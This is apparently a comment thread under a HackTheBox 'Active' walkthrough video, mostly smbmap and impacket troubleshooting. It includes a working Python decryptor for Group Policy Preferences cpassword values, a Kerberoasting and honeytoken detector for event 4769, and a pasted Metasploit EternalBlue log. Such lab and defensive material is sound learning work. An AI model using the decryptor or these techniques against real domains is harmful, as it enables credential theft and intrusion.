this guys brain is absolutely massive
I was doing the box last night. I finished it myself. I make a habit of then looking at writeups to learn anything new... going back to last night, I spent an hour going through they SMB shares manually. Good times.
It's going to take me forever to get anywhere near this level of knowledge of all the systems and commands.
You better now?
@@Stonekom Honestly, yes. This guy has been invaluable to me, even if I have pivoted into a different direction. The stuff I learned from this guy's content had a tangible effect on where I am today.
I would like to ask you, how is your situation now as an employee in the field or what?
@@zzzzzzzzZzZZzzzaZzz Good, though out of date by now. I pivoted into a different part of security.
@@zzzzzzzzZzZZzzzaZzz My situation is pretty good and still in the security industry, though I pivoted into a different direction. I used what I learned from this and a few other channels, they certainly were foundational in where I am now.
9:01 smbmap -R (capital R) is no longer in the latest Kali version. Only -r (lowercase r) is available.
Add the --depth flag with -r and it works.
smbmap -r Replication -H 10.10.10.100 --depth 10
thank you
I saw this misconfiguration in an environment, and thanks for showing your approach; it helped me create proper blue-team detection rules, as well as create a honeytoken account and just remove all the logon hours!
Could you one day do a video on how you set up your kraken box? I've been thinking about setting up something similar in AWS
@IppSec
I think it's just hashcat running on a box with an Nvidia GTX 1080 installed. It's not too fancy to set up. If you want to learn how to use hashcat check out the HTB Academy tutorial.
@@DavidThomsenPhD dammit, you’re persistent
So helpful, thanks a ton as always!! Was looking forward to this video from you! I'm in my OSCP labs right now and the Windows machines are definitely the hardest with the least info out. Thanks again!!!
Windows boxes are a pain in the ass, I'm suffering too.
@@striple765 me too
For anybody getting an error with smbmap and updatedb, make sure you are running as root or with sudo on the command.
Thaaaank you, I feel like I've wasted days (no, I have) on not providing the sudo command.
Just saved me so much time!
I got results from smbclient and can even get into the shares folder, but smbmap didn't show anything, not even shared folders. It says Access Denied. Why does it behave like that?
same here
clone the latest smbmap from git
pip3 install --upgrade impacket
or
pip install --upgrade impacket
Then it works fine now
hey there Ipp, I've got a question. How did you know that in order to decrypt the password you need to use the gppdecrypt program. I mean I know that you've done these boxes before, but even then, is it identifiable just by looking at it?
Yes, it is the default way Group Policy stores passwords. Just seeing the password in Groups.xml in the SYSVOL directory tells me what it is.
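The "just seeing it tells you what it is" point above comes down to two facts: every GPP cpassword is AES-256-CBC under a single key that Microsoft published in MS-GPPREF, and the value is written as base64 with the trailing padding stripped (which is why naive base64 decoding fails). The following is an added example for this thread, not IppSec's code and not gppdecrypt: it finds cpassword attributes in any of the GPP XML files (Groups.xml as on the box, but also Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml, which use the same Properties/@cpassword layout), restores the padding, and decrypts. It assumes the XML has already been copied off the share (a constructed Groups.xml stands in for it) and that pycryptodome is installed for the AES step; parsing and padding are pure standard library.

```python
"""Find and decrypt Group Policy Preferences cpassword values from SYSVOL XML.

Added example for this comment thread; not code from the video and not
gppdecrypt. Assumptions: the XML was already pulled from SYSVOL (a
constructed Groups.xml stands in for it below), and pycryptodome
(pip install pycryptodome) is present for the AES step.
"""
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in the MS-GPPREF specification. It is the
# same in every domain, so a cpassword is obfuscated, not protected.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_IV = b"\x00" * 16
AES_BLOCK = 16


def fix_base64_padding(cpassword: str) -> str:
    """GPP writes the base64 cpassword without trailing '=' padding; restore it."""
    return cpassword + "=" * (-len(cpassword) % 4)


def decode_cpassword_bytes(cpassword: str) -> bytes:
    """Base64-decode a cpassword and sanity-check it against the AES block size."""
    ciphertext = base64.b64decode(fix_base64_padding(cpassword))
    if len(ciphertext) % AES_BLOCK:
        raise ValueError("cpassword does not decode to whole AES blocks")
    return ciphertext


def find_cpasswords(xml_text: str) -> list:
    """Return every element in a GPP XML file that carries Properties/@cpassword.

    Groups.xml uses <User>; the other GPP files use different element names
    but the same Properties/@cpassword layout, so the search is by attribute.
    """
    root = ET.fromstring(xml_text)
    hits = []
    for elem in root.iter():
        props = elem.find("Properties")
        if props is None or not props.get("cpassword"):
            continue
        hits.append({
            "element": elem.tag,
            "name": elem.get("name"),
            "changed": elem.get("changed"),
            # Groups.xml uses userName; Services/Tasks use accountName or runAs
            "account": props.get("userName") or props.get("accountName")
            or props.get("runAs"),
            "cpassword": props.get("cpassword"),
        })
    return hits


def decrypt_cpassword(cpassword: str) -> str:
    """AES-256-CBC, zero IV, PKCS#7 padding; the plaintext is UTF-16-LE."""
    from Crypto.Cipher import AES            # pycryptodome; imported lazily so
    from Crypto.Util.Padding import unpad    # parsing works without it
    cipher = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=GPP_IV)
    plain = unpad(cipher.decrypt(decode_cpassword_bytes(cpassword)), AES_BLOCK)
    return plain.decode("utf-16-le")


def report(xml_text: str) -> list:
    """Parse, then try to decrypt each hit; keep the ciphertext on failure."""
    out = []
    for hit in find_cpasswords(xml_text):
        try:
            hit["password"] = decrypt_cpassword(hit["cpassword"])
        except (ImportError, ValueError) as exc:   # no pycryptodome / bad padding
            hit["password"], hit["error"] = None, str(exc)
        out.append(hit)
    return out


# Constructed sample: the layout of a real Groups.xml, but the cpassword is the
# unpadded base64 of 32 zero bytes (43 chars, no '='), not a real secret, so it
# will not decrypt to a meaningful password.
SAMPLE_CPASSWORD = "A" * 43
SAMPLE_GROUPS_XML = f"""<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="EXAMPLE\\svc_backup" image="2" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="{SAMPLE_CPASSWORD}" changeLogon="0" noChange="1"
                neverExpires="1" acctDisabled="0" userName="EXAMPLE\\svc_backup"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for hit in report(SAMPLE_GROUPS_XML):
        print(hit)
```

Point it at the files under Policies\{GUID}\MACHINE\Preferences\ on the share; the `changed` attribute is worth keeping, since an old timestamp is a quick indicator of how long the credential has been sitting in SYSVOL readable by every domain user.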
So complicated and advanced but it's very informative
I just grabbed the flag through SMB actually. Never did PSexec, but it would have been fun to do it that way.
I don't know what is wrong with this box; I've reverted the box and am typing smbclient -L //10.10.10.100 -N to list shares, but it doesn't give me a list of shares. It says protocol negotiation failed: NT_STATUS_CONNECTION_RESET.
Does anybody know why I do not see the groups.xml file? Neither when I list files/directories using smbmap nor when I search for the file itself: smbmap -R Replication -H 10.10.10.100 -A Groups.xml ?
add the depth switch as TongaRoots mentioned above "smbmap -R Replication --depth 10 -H 10.10.10.100"
How would one go about with the Bloodhound step using kali instead of windows?
You should really just use Windows. It may be possible to do something similar within impacket, but there are just too many bugs when doing this many types of RPC Calls.
@@ippsec Alright will do, thank you very much for your quick response!
running bloodhound-python remotely in Linux would give the same result but thanks though for the great walkthrough!
Hi @IppSec
Do you mind sharing the specs of your Kraken?
I saw you were running 4 GPUs, does hashcat auto-detect these GPUs?
This is why you don't use domain administrator accounts to run Kerberos services! The hash of any kerberos service account can be collected via the kerberoasting he does, so ideally every service account has a strong password and follows the principle of least privilege.
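The comment above and the earlier one about building blue-team detection rules and a honeytoken account describe the same thing from both sides: Kerberoasting leaves a trace on the DC as event 4769 (a service ticket was requested), and a low-privilege user suddenly asking for RC4 (etype 0x17) tickets for several user-account SPNs in a few seconds looks nothing like normal traffic. A honeytoken SPN account makes this sharper, because nothing legitimate ever requests a ticket for it; removing its logon hours stops anyone from using the account, but the KDC still issues a ticket for its SPN and still logs 4769. The following is an added example, not code from the video or from any SIEM: it runs both rules over a constructed list of 4769 events (parsed into dicts with the field names used below; not captured from a real DC) and assumes the honeytoken name is known to the detector.

```python
"""Flag Kerberoasting and honeytoken SPN requests in Windows Security event 4769.

Added example for this comment thread; not code from the video or from any
SIEM product. Assumes 4769 events are already parsed into dicts with the
field names used below (the sample list is constructed) and that the
honeytoken account name is known.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # etype 23; AES tickets show up as 0x11/0x12


def is_roastable_request(ev: dict) -> bool:
    """Classic Kerberoast signature: a successful TGS request for a user (not
    machine) service account using RC4, which tools ask for because RC4 tickets
    crack far faster than AES ones."""
    svc = ev["ServiceName"]
    return (
        ev["EventID"] == 4769
        and ev["TicketEncryptionType"].lower() == RC4_HMAC
        and not svc.endswith("$")          # machine accounts: random 120-char passwords
        and svc.lower() != "krbtgt"        # TGT requests, not service tickets
        and ev.get("Status", "0x0") == "0x0"
    )


def detect(events, honeytokens, window=timedelta(minutes=5), threshold=3):
    """Return alerts. Any 4769 naming a honeytoken SPN fires immediately, whatever
    the etype; a requester asking for `threshold` or more distinct RC4 service
    tickets inside `window` fires one burst alert."""
    honey = {h.lower() for h in honeytokens}
    alerts = []
    per_requester = defaultdict(list)      # (user, ip) -> [(time, spn), ...] in time order
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] != 4769:
            continue
        if ev["ServiceName"].lower() in honey:
            alerts.append({"rule": "honeytoken_spn_requested",
                           "requester": ev["TargetUserName"], "ip": ev["IpAddress"],
                           "service": ev["ServiceName"], "time": ev["TimeCreated"]})
        if is_roastable_request(ev):
            per_requester[(ev["TargetUserName"], ev["IpAddress"])].append(
                (ev["TimeCreated"], ev["ServiceName"]))
    for (user, ip), reqs in per_requester.items():
        for i, (start, _) in enumerate(reqs):      # sliding window over distinct SPNs
            spns = {spn for t, spn in reqs[i:] if t - start <= window}
            if len(spns) >= threshold:
                alerts.append({"rule": "kerberoast_burst", "requester": user, "ip": ip,
                               "distinct_services": sorted(spns), "window_start": start})
                break
    return alerts


# Constructed sample log: a low-privilege user pulling RC4 tickets for several
# user SPNs within seconds (what the video's Kerberoasting looks like from the
# DC's side), plus benign noise from another user.
T0 = datetime(2018, 7, 21, 10, 0, 0)
HONEYTOKENS = ["honey_svc"]


def make_event(sec, user, ip, service, etype, status="0x0"):
    return {"EventID": 4769, "TimeCreated": T0 + timedelta(seconds=sec),
            "TargetUserName": user, "IpAddress": ip, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status}


SAMPLE_EVENTS = [
    make_event(0, "svc_tgs", "10.10.14.3", "DC$", "0x12"),            # machine account, AES
    make_event(1, "svc_tgs", "10.10.14.3", "krbtgt", "0x17"),         # TGT, ignored
    make_event(2, "svc_tgs", "10.10.14.3", "Administrator", "0x17"),  # DA with an SPN
    make_event(3, "svc_tgs", "10.10.14.3", "svc_sql", "0x17"),
    make_event(4, "svc_tgs", "10.10.14.3", "svc_backup", "0x17"),
    make_event(5, "svc_tgs", "10.10.14.3", "honey_svc", "0x17"),      # honeytoken
    make_event(60, "jdoe", "10.10.20.7", "svc_sql", "0x12"),          # normal AES ticket
    make_event(600, "jdoe", "10.10.20.7", "Administrator", "0x17"),   # one request, below threshold
]


def run_sample():
    return detect(SAMPLE_EVENTS, HONEYTOKENS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

The RC4 rule is the noisy one in a real estate (legacy applications still request 0x17), so the threshold and window are the knobs to tune; the honeytoken rule needs no tuning and is the one to page on.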
Is it possible to connect to the windows machine from Linux, as a non admin user, having the password in plaintext, without RDP enabled?
That’s a lot of stipulations. It is possible in bad configurations, ie powershell remoting
@@ippsec Thank you ippsec. It just seems odd to a windows newbie's perspective, that we have several pass-the-hash tools, but no pass-the-pass :)
Hello, I want to prevent the use of ldapsearch or other tools to enumerate LDAP on the domain. Can you guide me on how to prevent it?
Hey, what happened to the premiere thing?! Found it helpful & cool that we could ask you questions!
I do it when I'm around to moderate the channel/answer questions. I've been traveling for the past 2-3 weeks.
When I scan using the same nmap command (-sV and -sC) it says all ports are filtered and doesn't give any version information :/
Anyone in OSCP should watch this video.
I am.. Love everything that ippsec does.
Indeed this is pretty cool, but way more advanced than OSCP with regards to the Kerberoasting part, isn't it?
8:21, look below, it's telling you which shares are open!
What if smb is still complaining with NT_STATUS_INVALID_INFO_CLASS listing \* ? Thanks
Great video, thank you!
GetADUsers is asking for the import version; tried many ways but didn't get results yet.
That's odd, I was able to psexec (the .py version from impacket) to Admin perms with the SVC_TGS.
Still a great BloodHound tutorial though!
Just one thing: how can you tell that the administrator is kerberoastable by watching the graph in BloodHound? 'Cause I see you've got the node administrator and the node dc.active.htb.
Any ideas why dnsrecon keeps maxing out my RAM, then overflowing into swap memory and completely freezing my Linux VM?
I have upped the RAM on my Kali VM to 16 gigs and whenever I run dnsrecon it keeps using more and more RAM until it maxes it out and completely freezes the virtual machine until I shut it down and start it up again. This can't be normal, can it?
Appreciate all the videos!
The same for me, and after some time my SMB connection gets killed and I get:
[*] Performing Reverse Lookup from 10.0.0.0 to 10.255.255.255
Killed
My SMB works fine until I run dnsrecon.
@@susnoname I can't remember how I fixed this but I did. I think I reinstalled Kali from scratch.
Actually, I think first I downloaded an older version of dnsrecon from github and used that instead. I think reinstalling Kali from scratch worked for fixing the current version for me though. I can't remember for sure.
@@Dave-ll2fm Thanks! I will try GitHub, as reinstalling is something I really don't want to do.
This box was pretty cool.
I did this box without BloodHound, I just did Kerberoasting after I got the password.
What's the difference between xargs grep and just piping to grep?
There are some commands that don't work just with a pipe, try googling it.
Hi, I know this is an old video, but since you are still active, could you make the font larger in the terminal? I watch your videos on my phone and it's really hard to read. Great content though.
I’ve experimented with trying to make it readable on phones. Decided not to as when going into programs like GDB/Ghidra/etc large font makes it difficult in my computer too. I don’t really prepare enough to switch between layouts when recording so don’t think I’ll be increasing it anymore
What's the hardware specification of your Kraken machine?
Last I heard he had 4x 1080s. Might be upgraded since.
Yeah you can see when he initializes hashcat that it recognizes 4 1080's. That's the dream right there lol
Hi, can you send a link to the video where you configure BloodHound?
Why not search Ippsec.rocks for BloodHound and choose one of the first videos?
I think on that DNS issue on the Windows box you could change the binding order on the NIC, but I could be wrong.
Nmap scan says all ports are filtered for me with the same setup.
That's awesome..
This box is one in a row I couldn't resolve (:
Thanks
I think there's a way to specify DNS in sharphound
Awesome video. You're the boss.
Could you make a walkthrough on Smasher? I want to see your approach to it.
I plan to do it around Christmas time.
holy shit.... 4 1080's....
Getting user on this was pretty easy, but root was way more difficult if you don't have AD experience :-)
Hello IppSec! Man, I got hooked on HackTheBox, a fantastic way to learn about pentesting; I'm trying to clear all the easy ones first and then move on to harder stuff. I have been getting the same error over and over and for some reason I can't find an answer to it: when I run ms17_010_eternalblue to try to gain access to a Windows box I always get the same message:
[*] Started reverse TCP handler on 10.10.15.10:4444
[*] 10.10.10.161:445 - Connecting to target for exploitation.
[+] 10.10.10.161:445 - Connection established for exploitation.
[!] 10.10.10.161:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 10.10.10.161:445 - Disable VerifyTarget option to proceed manually...
[-] 10.10.10.161:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
Hope you see this,
Thanks for what you do man.
That script connects to 445 and enumerates the version (target os) prior to throwing the exploit. It sees the os isn’t compatible with target and exits. Try it on Blue
smbmap -H 10.10.10.100 works fine. Why is this happening?
clone the latest smbmap from git
pip3 install --upgrade impacket
or
pip install --upgrade impacket
Then it works fine now
I failed to get root ☹️
Thanks for the video ippsec 😊
Hello dear,
I have been trying to enumerate Kioptrix1 (which is running Samba 2.2.1a) using "smbclient -L host", however, I'm getting an NT_STATUS_IO_TIMEOUT error. I looked at the Wireshark output and found out that the server (Kioptrix) is not responding to the "Negotiate Protocol Request" packet sent by the client.
Please, I need your help! Thank you in advance.
I full screened this at 07:30 before leaving for work, fell asleep at the computer, and woke up with the fear cause I thought it was 11:04am. Forgot I full screened it lol
hahaha :D
Wondering how this box is an easy one lol, I have to watch the video 3 times in a row just to understand what is even happening. Anyways, thanks for the video
#windowsBoxesSucks
Do you solve machines in a VM? If so, why?
Hold me accountable yall!!!
Very difficult
For anyone getting "Authentication Error" when running smbmap. There are some python packages that need to be installed/updated. See "Install Requirements" section at github.com/ShawnDEvans/smbmap
Hey, thanks for that, had been getting that error. I installed the requirements and it still won't work. Still get the same error, any ideas?
@@karanbhayani5571 did you install the requirements as sudo?
I thought this box was boring.
Try Offshore
I don't see the Groups.xml on the share.
-DNSServer 3.2.1.1
Can you speak a little bit more slowly? :-)
You can change it on the YT video. I am not a native speaker; he speaks pretty well, not too fast, not too slow, just perfect.